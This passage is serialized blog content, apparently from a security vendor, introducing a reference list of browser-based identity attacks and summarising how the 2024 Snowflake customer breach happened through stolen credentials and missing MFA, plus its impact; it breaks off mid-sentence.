6},{"sys":70937},{"id":61557,"type":1001,"linkType":1002},[],{"data":70940,"content":70941,"nodeType":860},{},[70942],{"data":70943,"marks":70944,"value":61565,"nodeType":864},{},[],{"data":70946,"content":70947,"nodeType":1009},{},[70948],{"data":70949,"marks":70950,"value":61572,"nodeType":864},{},[],{"data":70952,"content":70953,"nodeType":860},{},[70954],{"data":70955,"marks":70956,"value":61579,"nodeType":864},{},[],{"data":70958,"content":70961,"nodeType":996},{"target":70959},{"sys":70960},{"id":61584,"type":1001,"linkType":1002},[],{"data":70963,"content":70966,"nodeType":996},{"target":70964},{"sys":70965},{"id":61590,"type":1001,"linkType":1002},[],{"data":70968,"content":70969,"nodeType":1009},{},[70970],{"data":70971,"marks":70972,"value":58288,"nodeType":864},{},[],{"data":70974,"content":70975,"nodeType":860},{},[70976],{"data":70977,"marks":70978,"value":61604,"nodeType":864},{},[],{"data":70980,"content":70981,"nodeType":941},{},[70982,70991,71000,71009,71018,71066,71075],{"data":70983,"content":70984,"nodeType":945},{},[70985],{"data":70986,"content":70987,"nodeType":860},{},[70988],{"data":70989,"marks":70990,"value":61617,"nodeType":864},{},[],{"data":70992,"content":70993,"nodeType":945},{},[70994],{"data":70995,"content":70996,"nodeType":860},{},[70997],{"data":70998,"marks":70999,"value":61627,"nodeType":864},{},[],{"data":71001,"content":71002,"nodeType":945},{},[71003],{"data":71004,"content":71005,"nodeType":860},{},[71006],{"data":71007,"marks":71008,"value":61637,"nodeType":864},{},[],{"data":71010,"content":71011,"nodeType":945},{},[71012],{"data":71013,"content":71014,"nodeType":860},{},[71015],{"data":71016,"marks":71017,"value":61647,"nodeType":864},{},[],{"data":71019,"content":71020,"nodeType":945},{},[71021,71027],{"data":71022,"content":71023,"nodeType":860},{},[71024],{"data":71025,"marks":71026,"value":61657,"nodeType":864},{},[],{"data":71028,"content":71029,"nodeType":941},{},[71030,71039,71048,71057],{"data":71031,"content":71032,"nodeType":945},{},[71033],{"data":71034,"content":71035,"nodeType":860},{},[71036],{"data":71037,"marks":71038,"value":61670,"nodeType":864},{},[],{"data":71040,"content":71041,"nodeType":945},{},[71042],{"data":71043,"content":71044,"nodeType":860},{},[71045],{"data":71046,"marks":71047,"value":61680,"nodeType":864},{},[],{"data":71049,"content":71050,"nodeType":945},{},[71051],{"data":71052,"content":71053,"nodeType":860},{},[71054],{"data":71055,"marks":71056,"value":61690,"nodeType":864},{},[],{"data":71058,"content":71059,"nodeType":945},{},[71060],{"data":71061,"content":71062,"nodeType":860},{},[71063],{"data":71064,"marks":71065,"value":61700,"nodeType":864},{},[],{"data":71067,"content":71068,"nodeType":945},{},[71069],{"data":71070,"content":71071,"nodeType":860},{},[71072],{"data":71073,"marks":71074,"value":61710,"nodeType":864},{},[],{"data":71076,"content":71077,"nodeType":945},{},[71078],{"data":71079,"content":71080,"nodeType":860},{},[71081],{"data":71082,"marks":71083,"value":61720,"nodeType":864},{},[],{"data":71085,"content":71086,"nodeType":1009},{},[71087],{"data":71088,"marks":71089,"value":24968,"nodeType":864},{},[],{"data":71091,"content":71092,"nodeType":860},{},[71093],{"data":71094,"marks":71095,"value":61733,"nodeType":864},{},[],{"data":71097,"content":71098,"nodeType":860},{},[71099],{"data":71100,"marks":71101,"value":61740,"nodeType":864},{},[],{"items":71103},[71104,71106],{"sys":71105,"name":6593},{"id":6592},{"sys":71107,"name":342},{"id":6596},{"items":71109},[71110],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":71111},{"url":4955},{"__typename":2059,"sys":71113,"content":71114,"title":5236,"synopsis":60848,"hashTags":59,"publishedDate":60849,"slug":59151,"tagsCollection":71508,"authorsCollection":71514},{"id":58881},{"json":71115},{"data":71116,"content":71117,"nodeType":856},{},[71118,71134,71140,71146,71152,71168,71174,71190,71196,71202,71208,71214,71220,71226,71232,71248,71254,71260,71265,71271,71277,71283,71288,71293,71298,71304,71310,71315,71321,71327,71333,71338,71344,71350,71356,71362,71368,71373,71379,71385,71390,71396,71402,71407,71413,71419,71478,71484,71490,71496,71502],{"data":71119,"content":71120,"nodeType":860},{},[71121,71124,71131],{"data":71122,"marks":71123,"value":60406,"nodeType":864},{},[],{"data":71125,"content":71126,"nodeType":883},{"uri":6418},[71127],{"data":71128,"marks":71129,"value":5765,"nodeType":864},{},[71130],{"type":1455},{"data":71132,"marks":71133,"value":60417,"nodeType":864},{},[],{"data":71135,"content":71136,"nodeType":860},{},[71137],{"data":71138,"marks":71139,"value":60424,"nodeType":864},{},[],{"data":71141,"content":71142,"nodeType":860},{},[71143],{"data":71144,"marks":71145,"value":60431,"nodeType":864},{},[],{"data":71147,"content":71148,"nodeType":1009},{},[71149],{"data":71150,"marks":71151,"value":58596,"nodeType":864},{},[],{"data":71153,"content":71154,"nodeType":860},{},[71155,71158,71165],{"data":71156,"marks":71157,"value":21,"nodeType":864},{},[],{"data":71159,"content":71160,"nodeType":883},{"uri":58605},[71161],{"data":71162,"marks":71163,"value":58610,"nodeType":864},{},[71164],{"type":1455},{"data":71166,"marks":71167,"value":58614,"nodeType":864},{},[],{"data":71169,"content":71170,"nodeType":1009},{},[71171],{"data":71172,"marks":71173,"value":60460,"nodeType":864},{},[],{"data":71175,"content":71176,"nodeType":860},{},[71177,71180,71187],{"data":71178,"marks":71179,"value":21,"nodeType":864},{},[],{"data":71181,"content":71182,"nodeType":883},{"uri":40614},[71183],{"data":71184,"marks":71185,"value":5272,"nodeType":864},{},[71186],{"type":1455},{"data":71188,"marks":71189,"value":60477,"nodeType":864},{},[],{"data":71191,"content":71192,"nodeType":1009},{},[71193],{"data":71194,"marks":71195,"value":60484,"nodeType":864},{},[],{"data":71197,"content":71198,"nodeType":860},{},[71199],{"data":71200,"marks":71201,"value":60491,"nodeType":864},{},[],{"data":71203,"content":71204,"nodeType":860},{},[71205],{"data":71206,"marks":71207,"value":60498,"nodeType":864},{},[],{"data":71209,"content":71210,"nodeType":860},{},[71211],{"data":71212,"marks":71213,"value":60505,"nodeType":864},{},[],{"data":71215,"content":71216,"nodeType":860},{},[71217],{"data":71218,"marks":71219,"value":60512,"nodeType":864},{},[],{"data":71221,"content":71222,"nodeType":860},{},[71223],{"data":71224,"marks":71225,"value":60519,"nodeType":864},{},[],{"data":71227,"content":71228,"nodeType":1009},{},[71229],{"data":71230,"marks":71231,"value":60526,"nodeType":864},{},[],{"data":71233,"content":71234,"nodeType":860},{},[71235,71238,71245],{"data":71236,"marks":71237,"value":60533,"nodeType":864},{},[],{"data":71239,"content":71240,"nodeType":883},{"uri":60536},[71241],{"data":71242,"marks":71243,"value":60542,"nodeType":864},{},[71244],{"type":1455},{"data":71246,"marks":71247,"value":60546,"nodeType":864},{},[],{"data":71249,"content":71250,"nodeType":860},{},[71251],{"data":71252,"marks":71253,"value":60553,"nodeType":864},{},[],{"data":71255,"content":71256,"nodeType":860},{},[71257],{"data":71258,"marks":71259,"value":60560,"nodeType":864},{},[],{"data":71261,"content":71264,"nodeType":996},{"target":71262},{"sys":71263},{"id":60565,"type":1001,"linkType":1002},[],{"data":71266,"content":71267,"nodeType":860},{},[71268],{"data":71269,"marks":71270,"value":60573,"nodeType":864},{},[],{"data":71272,"content":71273,"nodeType":1312},{},[71274],{"data":71275,"marks":71276,"value":60580,"nodeType":864},{},[],{"data":71278,"content":71279,"nodeType":860},{},[71280],{"data":71281,"marks":71282,"value":60587,"nodeType":864},{},[],{"data":71284,"content":71287,"nodeType":996},{"target":71285},{"sys":71286},{"id":60592,"type":1001,"linkType":1002},[],{"data":71289,"content":71292,"nodeType":996},{"target":71290},{"sys":71291},{"id":60598,"type":1001,"linkType":1002},[],{"data":71294,"content":71297,"nodeType":996},{"target":71295},{"sys":71296},{"id":60604,"type":1001,"linkType":1002},[],{"data":71299,"content":71300,"nodeType":1312},{},[71301],{"data":71302,"marks":71303,"value":60612,"nodeType":864},{},[],{"data":71305,"content":71306,"nodeType":860},{},[71307],{"data":71308,"marks":71309,"value":60619,"nodeType":864},{},[],{"data":71311,"content":71314,"nodeType":996},{"target":71312},{"sys":71313},{"id":60624,"type":1001,"linkType":1002},[],{"data":71316,"content":71317,"nodeType":1312},{},[71318],{"data":71319,"marks":71320,"value":60632,"nodeType":864},{},[],{"data":71322,"content":71323,"nodeType":860},{},[71324],{"data":71325,"marks":71326,"value":60639,"nodeType":864},{},[],{"data":71328,"content":71329,"nodeType":860},{},[71330],{"data":71331,"marks":71332,"value":60646,"nodeType":864},{},[],{"data":71334,"content":71337,"nodeType":996},{"target":71335},{"sys":71336},{"id":60651,"type":1001,"linkType":1002},[],{"data":71339,"content":71340,"nodeType":860},{},[71341],{"data":71342,"marks":71343,"value":60659,"nodeType":864},{},[],{"data":71345,"content":71346,"nodeType":1009},{},[71347],{"data":71348,"marks":71349,"value":60666,"nodeType":864},{},[],{"data":71351,"content":71352,"nodeType":1312},{},[71353],{"data":71354,"marks":71355,"value":60673,"nodeType":864},{},[],{"data":71357,"content":71358,"nodeType":860},{},[71359],{"data":71360,"marks":71361,"value":60680,"nodeType":864},{},[],{"data":71363,"content":71364,"nodeType":860},{},[71365],{"data":71366,"marks":71367,"value":60687,"nodeType":864},{},[],{"data":71369,"content":71372,"nodeType":996},{"target":71370},{"sys":71371},{"id":60692,"type":1001,"linkType":1002},[],{"data":71374,"content":71375,"nodeType":1312},{},[71376],{"data":71377,"marks":71378,"value":60700,"nodeType":864},{},[],{"data":71380,"content":71381,"nodeType":860},{},[71382],{"data":71383,"marks":71384,"value":60707,"nodeType":864},{},[],{"data":71386,"content":71389,"nodeType":996},{"target":71387},{"sys":71388},{"id":60712,"type":1001,"linkType":1002},[],{"data":71391,"content":71392,"nodeType":860},{},[71393],{"data":71394,"marks":71395,"value":60720,"nodeType":864},{},[],{"data":71397,"content":71398,"nodeType":860},{},[71399],{"data":71400,"marks":71401,"value":60727,"nodeType":864},{},[],{"data":71403,"content":71406,"nodeType":996},{"target":71404},{"sys":71405},{"id":60732,"type":1001,"linkType":1002},[],{"data":71408,"content":71409,"nodeType":1009},{},[71410],{"data":71411,"marks":71412,"value":58288,"nodeType":864},{},[],{"data":71414,"content":71415,"nodeType":860},{},[71416],{"data":71417,"marks":71418,"value":60746,"nodeType":864},{},[],{"data":71420,"content":71421,"nodeType":941},{},[71422,71431,71440,71459],{"data":71423,"content":71424,"nodeType":945},{},[71425],{"data":71426,"content":71427,"nodeType":860},{},[71428],{"data":71429,"marks":71430,"value":60759,"nodeType":864},{},[],{"data":71432,"content":71433,"nodeType":945},{},[71434],{"data":71435,"content":71436,"nodeType":860},{},[71437],{"data":71438,"marks":71439,"value":60769,"nodeType":864},{},[],{"data":71441,"content":71442,"nodeType":945},{},[71443],{"data":71444,"content":71445,"nodeType":860},{},[71446,71449,71456],{"data":71447,"marks":71448,"value":60779,"nodeType":864},{},[],{"data":71450,"content":71451,"nodeType":883},{"uri":60782},[71452],{"data":71453,"marks":71454,"value":60788,"nodeType":864},{},[71455],{"type":1455},{"data":71457,"marks":71458,"value":21,"nodeType":864},{},[],{"data":71460,"content":71461,"nodeType":945},{},[71462],{"data":71463,"content":71464,"nodeType":860},{},[71465,71468,71475],{"data":71466,"marks":71467,"value":60801,"nodeType":864},{},[],{"data":71469,"content":71470,"nodeType":883},{"uri":60804},[71471],{"data":71472,"marks":71473,"value":60810,"nodeType":864},{},[71474],{"type":1455},{"data":71476,"marks":71477,"value":21,"nodeType":864},{},[],{"data":71479,"content":71480,"nodeType":860},{},[71481],{"data":71482,"marks":71483,"value":60820,"nodeType":864},{},[],{"data":71485,"content":71486,"nodeType":1312},{},[71487],{"data":71488,"marks":71489,"value":24968,"nodeType":864},{},[],{"data":71491,"content":71492,"nodeType":860},{},[71493],{"data":71494,"marks":71495,"value":60833,"nodeType":864},{},[],{"data":71497,"content":71498,"nodeType":860},{},[71499],{"data":71500,"marks":71501,"value":60840,"nodeType":864},{},[],{"data":71503,"content":71504,"nodeType":860},{},[71505],{"data":71506,"marks":71507,"value":60847,"nodeType":864},{},[],{"items":71509},[71510,71512],{"sys":71511,"name":6593},{"id":6592},{"sys":71513,"name":342},{"id":6596},{"items":71515},[71516],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":71517},{"url":4955},{"__typename":2059,"sys":71519,"content":71521,"title":74473,"synopsis":74474,"hashTags":59,"publishedDate":74475,"slug":74476,"tagsCollection":74477,"authorsCollection":74483},{"id":71520},"6XIts2UEnrsJDki8gKDXyI",{"json":71522},{"data":71523,"content":71524,"nodeType":856},{},[71525,71532,71564,71571,71577,71584,71604,71627,71634,71641,71665,71681,71688,71700,71707,71710,71717,71724,71740,71752,71763,71793,71796,71803,71821,71828,71836,71932,71939,72078,72085,72205,72212,72219,72392,72399,72406,72489,72492,72499,72506,72513,72576,72583,72616,72623,72666,72672,72678,72912,72918,72926,72933,72936,72943,72950,72957,73010,73017,73060,73067,73100,73106,73112,73278,73284,73292,73299,73307,73314,73322,73329,73332,73339,73346,73353,73416,73423,73456,73463,73496,73502,73508,73614,73617,73624,73631,73638,73701,73708,73741,73748,73781,73787,73793,73968,73971,73978,73985,73992,74065,74072,74105,74112,74145,74151,74157,74387,74390,74397,74404,74411,74418,74421,74428,74435,74442,74445,74452,74459,74466],{"data":71526,"content":71527,"nodeType":1009},{},[71528],{"data":71529,"marks":71530,"value":71531,"nodeType":864},{},[],"Browser-based Identity attacks on the rise?",{"data":71533,"content":71534,"nodeType":860},{},[71535,71539,71548,71552,71561],{"data":71536,"marks":71537,"value":71538,"nodeType":864},{},[],"Identity has been recorded as the #1 cyber attack vector since forever. You don’t have to look particularly hard to find statistics to support this. In 2023, one source reports that ",{"data":71540,"content":71542,"nodeType":883},{"uri":71541},"https://www.csoonline.com/article/648894/identity-based-security-threats-are-growing-rapidly-report.html",[71543],{"data":71544,"marks":71545,"value":71547,"nodeType":864},{},[71546],{"type":1455},"4/5 breaches involved identity and compromised credentials",{"data":71549,"marks":71550,"value":71551,"nodeType":864},{},[],", while another suggests that ",{"data":71553,"content":71555,"nodeType":883},{"uri":71554},"https://rakgarg.substack.com/p/identity-crisis-the-biggest-prize",[71556],{"data":71557,"marks":71558,"value":71560,"nodeType":864},{},[71559],{"type":1455},"75% of breaches are caused by mismanaged identity, access, or privileges",{"data":71562,"marks":71563,"value":2924,"nodeType":864},{},[],{"data":71565,"content":71566,"nodeType":860},{},[71567],{"data":71568,"marks":71569,"value":71570,"nodeType":864},{},[],"Phishing, social engineering, credential stuffing, and business email compromise have morphed into a homogenous understanding of identity threats that are generally tackled through a combination of email security tooling, content access controls, and user awareness. ",{"data":71572,"content":71576,"nodeType":996},{"target":71573},{"sys":71574},{"id":71575,"type":1001,"linkType":1002},"5NRWvCl0xsoWcpgHbcQIkf",[],{"data":71578,"content":71579,"nodeType":860},{},[71580],{"data":71581,"marks":71582,"value":71583,"nodeType":864},{},[],"The fact that such attacks have been reported as the top security threat for so long probably means that people pay less attention to identity threats. Ransomware grabs the headlines, and rightly so in many cases, but phishing feels like a “known known” that we have a plan for (even if the plan often fails). ",{"data":71585,"content":71586,"nodeType":860},{},[71587,71591,71600],{"data":71588,"marks":71589,"value":71590,"nodeType":864},{},[],"In fact, there’s a problem with messaging generally. The ",{"data":71592,"content":71594,"nodeType":883},{"uri":71593},"https://www.verizon.com/business/resources/T78/reports/data-breach-investigation-report_2015.pdf",[71595],{"data":71596,"marks":71597,"value":71599,"nodeType":864},{},[71598],{"type":1455},"2015 Verizon DBIR",{"data":71601,"marks":71602,"value":71603,"nodeType":864},{},[]," contains plenty of stats that still ring largely true today. For example:",{"data":71605,"content":71606,"nodeType":941},{},[71607,71617],{"data":71608,"content":71609,"nodeType":945},{},[71610],{"data":71611,"content":71612,"nodeType":860},{},[71613],{"data":71614,"marks":71615,"value":71616,"nodeType":864},{},[],"In the 2013 DBIR, phishing was associated with over 95% of incidents attributed to state sponsored actors, and for two years running, more than two-thirds of incidents have featured phishing",{"data":71618,"content":71619,"nodeType":945},{},[71620],{"data":71621,"content":71622,"nodeType":860},{},[71623],{"data":71624,"marks":71625,"value":71626,"nodeType":864},{},[],"In 60% of cases, attackers are able to compromise an organization within minutes",{"data":71628,"content":71629,"nodeType":860},{},[71630],{"data":71631,"marks":71632,"value":71633,"nodeType":864},{},[],"Remove the dates and a lot of the report still stands up. ",{"data":71635,"content":71636,"nodeType":1312},{},[71637],{"data":71638,"marks":71639,"value":71640,"nodeType":864},{},[],"Bad then, worse now",{"data":71642,"content":71643,"nodeType":860},{},[71644,71648,71653,71657,71662],{"data":71645,"marks":71646,"value":71647,"nodeType":864},{},[],"But browser-based identity attacks ",{"data":71649,"marks":71650,"value":71652,"nodeType":864},{},[71651],{"type":899},"are",{"data":71654,"marks":71655,"value":71656,"nodeType":864},{},[]," worse than they used to be. Yes, credential stuffing, phishing, and SIM swapping may not be the most sophisticated attacks, but they remain as effective as ever. ",{"data":71658,"marks":71659,"value":71661,"nodeType":864},{},[71660],{"type":2246},"As the saying goes, if it ain’t broke — don’t fix it.",{"data":71663,"marks":71664,"value":14717,"nodeType":864},{},[],{"data":71666,"content":71667,"nodeType":860},{},[71668,71672,71677],{"data":71669,"marks":71670,"value":71671,"nodeType":864},{},[],"Recent attacks have moved toward a broader targeting of the ",{"data":71673,"marks":71674,"value":71676,"nodeType":864},{},[71675],{"type":899},"identity infrastructure",{"data":71678,"marks":71679,"value":71680,"nodeType":864},{},[],". While phishing and social engineering was once primarily a delivery mechanism for malicious payloads to be executed on endpoint, it is now used to harvest credentials and secrets for identity-based attacks against cloud apps and services. ",{"data":71682,"content":71683,"nodeType":860},{},[71684],{"data":71685,"marks":71686,"value":71687,"nodeType":864},{},[],"And because businesses have migrated to more cloud-based services and infrastructure, the compromise of an identity now has different consequences.",{"data":71689,"content":71690,"nodeType":860},{},[71691,71695],{"data":71692,"marks":71693,"value":71694,"nodeType":864},{},[],"The data and functionality that attackers seek has moved off endpoints and internal networks and onto cloud systems and SaaS applications, which organizations are using in large numbers (tens to hundreds). The modern way of working means that applications are more often than not directly exposed to the internet — and the only thing needed to access these apps are identities. ",{"data":71696,"marks":71697,"value":71699,"nodeType":864},{},[71698],{"type":899},"Naturally, it's much harder to stop credential stuffing attacks against 100 SaaS apps than the single centralized external VPN/webmail endpoint of yesteryear. ",{"data":71701,"content":71702,"nodeType":860},{},[71703],{"data":71704,"marks":71705,"value":71706,"nodeType":864},{},[],"It’s clear that stats alone don’t adequately capture the identity threat. So we have to look beyond the numbers to find out why. ",{"data":71708,"content":71709,"nodeType":1005},{},[],{"data":71711,"content":71712,"nodeType":1009},{},[71713],{"data":71714,"marks":71715,"value":71716,"nodeType":864},{},[],"Using this resource",{"data":71718,"content":71719,"nodeType":860},{},[71720],{"data":71721,"marks":71722,"value":71723,"nodeType":864},{},[],"To cut through some of the noise, we’ve compiled this list of reported attacks and explored what they mean for the identity threat landscape. ",{"data":71725,"content":71726,"nodeType":860},{},[71727,71731,71736],{"data":71728,"marks":71729,"value":71730,"nodeType":864},{},[],"This is not intended to be an exhaustive list of all attacks involving the compromise of digital identities (the list would be endless!). Nor is it something you should read all in one go (unless you ",{"data":71732,"marks":71733,"value":71735,"nodeType":864},{},[71734],{"type":2246},"really",{"data":71737,"marks":71738,"value":71739,"nodeType":864},{},[]," want to, we won’t stop you). We want it to be a resource that you can refer back to, that we will continue to update as new attacks are recorded. ",{"data":71741,"content":71742,"nodeType":860},{},[71743,71747],{"data":71744,"marks":71745,"value":71746,"nodeType":864},{},[],"In this context we define identity attacks as ",{"data":71748,"marks":71749,"value":71751,"nodeType":864},{},[71750],{"type":899},"attacks targeting cloud identities and their associated identity management systems, protocols, applications, and infrastructure. ",{"data":71753,"content":71754,"nodeType":860},{},[71755,71759],{"data":71756,"marks":71757,"value":71758,"nodeType":864},{},[],"The attacks recorded below are high profile examples of browser-based identity attacks",{"data":71760,"marks":71761,"value":71762,"nodeType":864},{},[]," that demonstrate how threat actors are leveraging the cloud identity plane to evade established cyber defenses and traverse new attack paths to achieve their goals. We’ve focused on attacks targeting identity infrastructure itself that are notable for their bypassing of traditional environments and established controls (e.g. Networkless or SaaS-to-SaaS attack paths). ",{"data":71764,"content":71765,"nodeType":860},{},[71766,71770,71777,71781,71790],{"data":71767,"marks":71768,"value":71769,"nodeType":864},{},[],"As with all publicly disclosed breaches, the level of detail and transparency we see varies. Where possible, we've mapped the threat actor Tactics, Techniques and Procedures to our ",{"data":71771,"content":71772,"nodeType":883},{"uri":5243},[71773],{"data":71774,"marks":71775,"value":5248,"nodeType":864},{},[71776],{"type":1455},{"data":71778,"marks":71779,"value":71780,"nodeType":864},{},[]," (previously the SaaS Attack Matrix). To learn more about SaaS attack techniques ",{"data":71782,"content":71784,"nodeType":883},{"uri":71783},"https://pushsecurity.com/blog/saas-attack-techniques/#id-problems-with-observing-saas-attacks",[71785],{"data":71786,"marks":71787,"value":71789,"nodeType":864},{},[71788],{"type":1455},"read the blog",{"data":71791,"marks":71792,"value":1774,"nodeType":864},{},[],{"data":71794,"content":71795,"nodeType":1005},{},[],{"data":71797,"content":71798,"nodeType":1009},{},[71799],{"data":71800,"marks":71801,"value":71802,"nodeType":864},{},[],"Snowflake – June 2024",{"data":71804,"content":71805,"nodeType":860},{},[71806,71810,71818],{"data":71807,"marks":71808,"value":71809,"nodeType":864},{},[],"The threat group known as ShinyHunters (also tracked as UNC5537) has claimed responsibility for breaching multiple organizations using Snowflake, a cloud-based data warehousing and analytics platform. The breach stems from the historical compromise of credentials used to access customer-specific Snowflake tenants, via infostealer infections. These credentials were used as part of a targeted campaign against Snowflake customers, which was exacerbated by the widespread absence of MFA due to the lack of MFA enforcement by default. At the time of writing, approximately 165 customers have been impacted globally ",{"data":71811,"content":71812,"nodeType":883},{"uri":17517},[71813],{"data":71814,"marks":71815,"value":71817,"nodeType":864},{},[71816],{"type":1455},"according to a report by Mandiant",{"data":71819,"marks":71820,"value":10094,"nodeType":864},{},[],{"data":71822,"content":71823,"nodeType":1312},{},[71824],{"data":71825,"marks":71826,"value":71827,"nodeType":864},{},[],"How did Snowflake get breached?",{"data":71829,"content":71830,"nodeType":860},{},[71831],{"data":71832,"marks":71833,"value":71835,"nodeType":864},{},[71834],{"type":2246},"It’s worth noting that customers/users of Snowflake were breached via their Snowflake tenants, and no central breach of Snowflake's own systems occurred.",{"data":71837,"content":71838,"nodeType":941},{},[71839,71849,71872,71882,71892,71902,71912,71922],{"data":71840,"content":71841,"nodeType":945},{},[71842],{"data":71843,"content":71844,"nodeType":860},{},[71845],{"data":71846,"marks":71847,"value":71848,"nodeType":864},{},[],"Snowflake users were infected with infostealer malware that harvested credentials from user devices over an extended period. The threat actor used Snowflake customer credentials that were previously exposed via several infostealer malware variants, including; VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER.",{"data":71850,"content":71851,"nodeType":945},{},[71852],{"data":71853,"content":71854,"nodeType":860},{},[71855,71859,71868],{"data":71856,"marks":71857,"value":71858,"nodeType":864},{},[],"Credentials appeared on criminal marketplaces e.g. dark web forums and ",{"data":71860,"content":71862,"nodeType":883},{"uri":71861},"https://www.troyhunt.com/telegram-combolists-and-361m-email-addresses/",[71863],{"data":71864,"marks":71865,"value":71867,"nodeType":864},{},[71866],{"type":1455},"Telegram channels",{"data":71869,"marks":71870,"value":71871,"nodeType":864},{},[]," as combolists (username, password, and login portal combinations). ",{"data":71873,"content":71874,"nodeType":945},{},[71875],{"data":71876,"content":71877,"nodeType":860},{},[71878],{"data":71879,"marks":71880,"value":71881,"nodeType":864},{},[],"Criminal groups (either ShinyHunters or another organization) saw the potential in targeting Snowflake users, based on the availability of credentials, number of customer organizations, and the value of the data that can be accessed in Snowflake. ",{"data":71883,"content":71884,"nodeType":945},{},[71885],{"data":71886,"content":71887,"nodeType":860},{},[71888],{"data":71889,"marks":71890,"value":71891,"nodeType":864},{},[],"ShinyHunters embarked on a large-scale campaign targeting Snowflake customer accounts using previously breached credentials. ",{"data":71893,"content":71894,"nodeType":945},{},[71895],{"data":71896,"content":71897,"nodeType":860},{},[71898],{"data":71899,"marks":71900,"value":71901,"nodeType":864},{},[],"ShinyHunters accessed user accounts that lacked MFA, belonging to approximately 165 Snowflake customers. ",{"data":71903,"content":71904,"nodeType":945},{},[71905],{"data":71906,"content":71907,"nodeType":860},{},[71908],{"data":71909,"marks":71910,"value":71911,"nodeType":864},{},[],"ShinyHunters used SQL-based reconnaissance, staging, and data exfiltration techniques, expedited by custom hacker tooling developed specifically for Snowflake, to conduct attacks at scale.",{"data":71913,"content":71914,"nodeType":945},{},[71915],{"data":71916,"content":71917,"nodeType":860},{},[71918],{"data":71919,"marks":71920,"value":71921,"nodeType":864},{},[],"ShinyHunters acquired massive quantities of Snowflake data based on the information that each customer stored in Snowflake or connected apps. The most sensitive data declared so far pertains to end-customers of each victim, for example PII, bank account and card information, etc.  ",{"data":71923,"content":71924,"nodeType":945},{},[71925],{"data":71926,"content":71927,"nodeType":860},{},[71928],{"data":71929,"marks":71930,"value":71931,"nodeType":864},{},[],"ShinyHunters began attempts to extort Snowflake and end-customers using the data acquired. ",{"data":71933,"content":71934,"nodeType":1312},{},[71935],{"data":71936,"marks":71937,"value":71938,"nodeType":864},{},[],"What was the impact of the Snowflake breach?",{"data":71940,"content":71941,"nodeType":941},{},[71942,71961,71993,72021,72040,72059],{"data":71943,"content":71944,"nodeType":945},{},[71945],{"data":71946,"content":71947,"nodeType":860},{},[71948,71952,71957],{"data":71949,"marks":71950,"value":71951,"nodeType":864},{},[],"Approximately ",{"data":71953,"marks":71954,"value":71956,"nodeType":864},{},[71955],{"type":899},"165 victims were identified by Mandiant",{"data":71958,"marks":71959,"value":71960,"nodeType":864},{},[],". Organizations are gradually coming forward to declare the breach and release customer communications accordingly, but not all victims have been named.",{"data":71962,"content":71963,"nodeType":945},{},[71964],{"data":71965,"content":71966,"nodeType":860},{},[71967,71971,71976,71980,71989],{"data":71968,"marks":71969,"value":71970,"nodeType":864},{},[],"Based on the figures being suggested so far, the impact upon end-customers is huge, with the data of ",{"data":71972,"marks":71973,"value":71975,"nodeType":864},{},[71974],{"type":899},"hundreds of millions of people exposed",{"data":71977,"marks":71978,"value":71979,"nodeType":864},{},[],", and has been touted by some news outlets as ‘",{"data":71981,"content":71983,"nodeType":883},{"uri":71982},"https://www.wired.com/story/snowflake-breach-advanced-auto-parts-lendingtree/",[71984],{"data":71985,"marks":71986,"value":71988,"nodeType":864},{},[71987],{"type":1455},"one of the biggest breaches ever",{"data":71990,"marks":71991,"value":71992,"nodeType":864},{},[],"’.  ",{"data":71994,"content":71995,"nodeType":945},{},[71996],{"data":71997,"content":71998,"nodeType":860},{},[71999,72003,72008,72012,72017],{"data":72000,"marks":72001,"value":72002,"nodeType":864},{},[],"The impact on the affected businesses is largely unknown at this stage. It’s clear that the victims will suffer ",{"data":72004,"marks":72005,"value":72007,"nodeType":864},{},[72006],{"type":899},"reputational damage",{"data":72009,"marks":72010,"value":72011,"nodeType":864},{},[]," based on the extent of their individual breaches, and possibly face other ",{"data":72013,"marks":72014,"value":72016,"nodeType":864},{},[72015],{"type":899},"penalties and sanctions",{"data":72018,"marks":72019,"value":72020,"nodeType":864},{},[]," if they are found to be at fault by their respective regulators and/or national information security authorities. ",{"data":72022,"content":72023,"nodeType":945},{},[72024],{"data":72025,"content":72026,"nodeType":860},{},[72027,72031,72036],{"data":72028,"marks":72029,"value":72030,"nodeType":864},{},[],"The impact upon individuals will be significant, with high potential for further targeting in terms of ",{"data":72032,"marks":72033,"value":72035,"nodeType":864},{},[72034],{"type":899},"identity theft, blackmail, financial crime",{"data":72037,"marks":72038,"value":72039,"nodeType":864},{},[],", etc.  ",{"data":72041,"content":72042,"nodeType":945},{},[72043],{"data":72044,"content":72045,"nodeType":860},{},[72046,72050,72055],{"data":72047,"marks":72048,"value":72049,"nodeType":864},{},[],"It is unclear what data has been exposed in addition to personal data affecting end-customers. If other sensitive commercial or business data pertaining to ",{"data":72051,"marks":72052,"value":72054,"nodeType":864},{},[72053],{"type":899},"Intellectual Property",{"data":72056,"marks":72057,"value":72058,"nodeType":864},{},[]," has been exposed then this data may also be sold on via other nefarious channels, with a potential future impact.",{"data":72060,"content":72061,"nodeType":945},{},[72062],{"data":72063,"content":72064,"nodeType":860},{},[72065,72069,72074],{"data":72066,"marks":72067,"value":72068,"nodeType":864},{},[],"Given the lack of MFA for the compromised accounts, there has been a general criticism of the ‘opt-in’ nature of MFA for SaaS services, with many security professionals suggesting that ",{"data":72070,"marks":72071,"value":72073,"nodeType":864},{},[72072],{"type":899},"Snowflake should enforce MFA by default",{"data":72075,"marks":72076,"value":72077,"nodeType":864},{},[]," given the critical nature of the service. ",{"data":72079,"content":72080,"nodeType":1312},{},[72081],{"data":72082,"marks":72083,"value":72084,"nodeType":864},{},[],"What stands out in the Snowflake breach?",{"data":72086,"content":72087,"nodeType":941},{},[72088,72107,72149,72177],{"data":72089,"content":72090,"nodeType":945},{},[72091],{"data":72092,"content":72093,"nodeType":860},{},[72094,72098,72103],{"data":72095,"marks":72096,"value":72097,"nodeType":864},{},[],"The breach ",{"data":72099,"marks":72100,"value":72102,"nodeType":864},{},[72101],{"type":899},"was achieved by using stolen credentials dating back as far as 2020",{"data":72104,"marks":72105,"value":72106,"nodeType":864},{},[],", that had not been rotated or changed. This indicates that many of the credentials used were not necessarily the result of any recent data sharing. This highlights the potential risk of breached credentials already in the public domain; particularly in the case of cloud services that may not be subject to the same levels of credential hygiene as other traditional network logins. ",{"data":72108,"content":72109,"nodeType":945},{},[72110],{"data":72111,"content":72112,"nodeType":860},{},[72113,72117,72125,72128,72133,72137,72146],{"data":72114,"marks":72115,"value":72116,"nodeType":864},{},[],"Much of the industry response has focused on ensuring 